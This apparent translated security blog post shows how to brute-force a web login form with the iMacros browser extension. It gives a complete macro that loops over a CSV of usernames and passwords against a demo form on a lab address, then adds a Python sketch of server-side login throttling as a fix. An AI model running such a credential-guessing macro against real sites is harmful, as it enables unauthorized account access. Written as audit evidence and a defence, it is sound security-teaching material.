Thursday, February 16, 2012

1. Brute-force password testing with iMacros!


"In order to achieve what is possible, you have to try the impossible over and over again" - Hermann Hesse



Hello!

In this post, my first with content, I'm going to present an alternative to the usual brute-force tools used to get credentials in a portal.

The story begins one day when I was auditing a website with a form vulnerable to brute-force attacks (because it didn't implement waiting times between requests), and I wanted to provide evidence because, as you know, it is not the same to say "fire burns" as to say "put your hand here and you will see how hot it is"; the second option is more shocking.

So I tried to use one of the most popular tools for this purpose, Medusa / Hydra, and I was going crazy trying to write the command that fits that form, but no way. The problem was that the identifiers of the form fields were dynamically generated with JavaScript and have the nice habit of changing, so I could not reference them (if anyone knows how, please explain it to me).

Having discarded the common tools, I thought of using iMacros, available as an extension for Firefox (and also part of the excellent FireCat or Mantra suites), which lets you automate tasks in the browser with a lot of versatility.

I have known iMacros for a few years thanks to a friend, Mr Adrian Capdevila. He used it to automate repetitive tasks and, later, some restless minds exported this idea to play with an advantage in some web games.

The fact is that this extension allows you to record a task and then repeat it over and over again, and this, in essence, is like a brute-force attack. I just had to see if I could handle variable data: as in the title, "try the impossible over and over again", and that may "achieve what is possible".

So, as you can imagine from the fact that I wrote this article, I finally got it working, and I'm going to explain how:

  • We open our target form (you can see a very simple example I created for the occasion, as it does not seem very ethical to show a real case that could be easily reused) and we load the extension.





  • Then, in the "Rec" tab, the click mode should be X/Y, since the value of the HTML tag keeps changing and is not useful.



  • Then we click on the "Record" button and take the necessary steps for a connection attempt, which are:
    • Click in user text area, "Usuario"
    • Write user name (anything)
    • Click in password text area, "Contraseña"
    • Write password (anything)
    • Click Login button, "Autenticar"
    • Click in "Stop"
    • Save generated file with "Save"

NOTE: It is very important to perform these actions with mouse clicks and not by pressing Tab or Enter keys, because we want to register the positions where we clicked.



  • The file looks like:
VERSION BUILD=7400919 RECORDER=FX
TAB T=1
URL GOTO=http://10.0.0.5/index.html
CLICK X=324 Y=113
TAG POS=1 TYPE=INPUT:TEXT FORM=ACTION:/cgi-bin/validate.pl ATTR=NAME:user CONTENT=usuario
CLICK X=324 Y=113 CONTENT=usuario
CLICK X=324 Y=140
SET !ENCRYPTION NO
CONTENT=contrasenya
CLICK X=192 Y=164


  • That can be simplified to:
VERSION BUILD=7400919 RECORDER=FX
TAB T=1
URL GOTO=http://10.0.0.5/index.html
CLICK X=324 Y=113 CONTENT=usuario
SET !ENCRYPTION NO
CLICK X=324 Y=140 CONTENT=contrasenya
CLICK X=192 Y=164


  • We can test its performance on the "Play" tab and, if it goes well, then we have a base that can be modified to work in iterative mode.

  • Now it is necessary to add a file with users and passwords as a data source. In this case I used a file in CSV format, because iMacros handles it very well, and with a little Perl script I had previously filled in a few lines in the format "user", "password".
' File with users and passwords for testing. This is a CSV with 2 columns
SET !DATASOURCE /home/users/jluispellicer/dictionary.csv
SET !DATASOURCE_COLUMNS 2
 

  • Next, we must define the iteration over this file with the !LOOP command.
' We start the iteration with the initial value 1
SET !LOOP 1
SET !DATASOURCE_LINE {{!LOOP}}

  • And, finally, substitute the values with variables that contain the file data.
' Fill name
CLICK X=324 Y=113 CONTENT={{!COL1}}

' Fill password
CLICK X=324 Y=140 CONTENT={{!COL2}}

  • This is the final code with comments, which works on my form.
VERSION BUILD=7400919 RECORDER=FX

' Close all tabs but the current one
TAB CLOSEALLOTHERS
TAB T=1

' File with users and passwords for testing. This is a CSV with 2 columns
SET !DATASOURCE /home/users/jluispellicer/dictionary.csv
SET !DATASOURCE_COLUMNS 2

' We start the iteration with the initial value 1
SET !LOOP 1
SET !DATASOURCE_LINE {{!LOOP}}

' Close page
'URL GOTO=http://10.0.0.5/index.html

' Fill name
CLICK X=324 Y=113 CONTENT={{!COL1}}

' Fill password
SET !ENCRYPTION NO
CLICK X=324 Y=140 CONTENT={{!COL2}}

' Click on the Login button, Autenticar
CLICK X=192 Y=164



  • Once everything is prepared, we set "Repeat Macro Max" to a high value and click on "Play (Loop)", as shown in the following video, which ends with the successful password:


As you will see, it isn't a very efficient method, as it waits for the page to be fully loaded and I have not set any stop condition, but iMacros offers many more possibilities: from the web interface you can write to a file, use JavaScript code, etc., and furthermore it can be used from different programming languages.
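The weakness that made all of this possible, a form with no waiting time between attempts, has to be closed on the server, because coordinates, field ids and the rest of the page are controlled by the client. The following sketch is an added example, not code from the original post or from the audited site: a per-account and per-IP throttle with exponential waiting times. The names LoginThrottle, login and verify are hypothetical, and state is kept in memory for a single process.

```python
import time

class LoginThrottle:
    """Enforce a server-side waiting time after failed logins, per account and per client IP."""

    def __init__(self, free_attempts=3, base_delay=2.0, max_delay=900.0,
                 forget_after=3600.0, clock=time.monotonic):
        self.free_attempts, self.base_delay, self.max_delay = free_attempts, base_delay, max_delay
        self.forget_after, self.clock = forget_after, clock
        self._state = {}  # key -> (consecutive failures, earliest time of the next allowed attempt)

    def _keys(self, username, ip):
        # Keyed on what the server receives, so it holds however the browser is driven.
        return (("user", username.strip().lower()), ("ip", ip))

    def retry_after(self, username, ip):
        """Seconds still to wait before an attempt is evaluated (0.0 means go ahead)."""
        now = self.clock()
        return max(max(0.0, self._state.get(k, (0, now))[1] - now) for k in self._keys(username, ip))

    def record_failure(self, username, ip):
        now = self.clock()
        for key in self._keys(username, ip):
            failures, allowed_at = self._state.get(key, (0, now))
            if now - allowed_at > self.forget_after:  # long quiet period: start over
                failures = 0
            failures += 1
            extra = failures - self.free_attempts
            # Exponent is capped so a very long failure streak cannot overflow the float.
            delay = 0.0 if extra <= 0 else min(self.max_delay, self.base_delay * 2 ** min(extra - 1, 20))
            self._state[key] = (failures, now + delay)

    def record_success(self, username, ip):
        # Clear the account counter only; the IP counter stays, so one valid login
        # cannot be used to reset the penalty for guessing other accounts.
        self._state.pop(("user", username.strip().lower()), None)


def login(throttle, verify, username, password, ip):
    """verify(username, password) -> bool stands for the application's own credential check."""
    wait = throttle.retry_after(username, ip)
    if wait > 0:
        return ("throttled", wait)  # the password is not even evaluated
    if verify(username, password):
        throttle.record_success(username, ip)
        return ("ok", 0.0)
    throttle.record_failure(username, ip)
    return ("denied", throttle.retry_after(username, ip))
```

With these defaults, a client that submits one guess per second gets 15 guesses evaluated in an hour instead of 3600, and a correct password sent during a waiting period is rejected like any other.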

Well, I hope you liked it. If there is any doubt, you can ask in the comments, and if you want any script or file I used, you can request it from me without any problem. I did not want to go into too much detail, for example about the extension's API, so as not to focus on that but rather on the possibility of using iMacros for this purpose.


Greetings!


NOTE: This is a non-automatic translation of the original blog post, written in Spanish. I hope you can understand it; please tell me if you find errors. Thanks a lot!
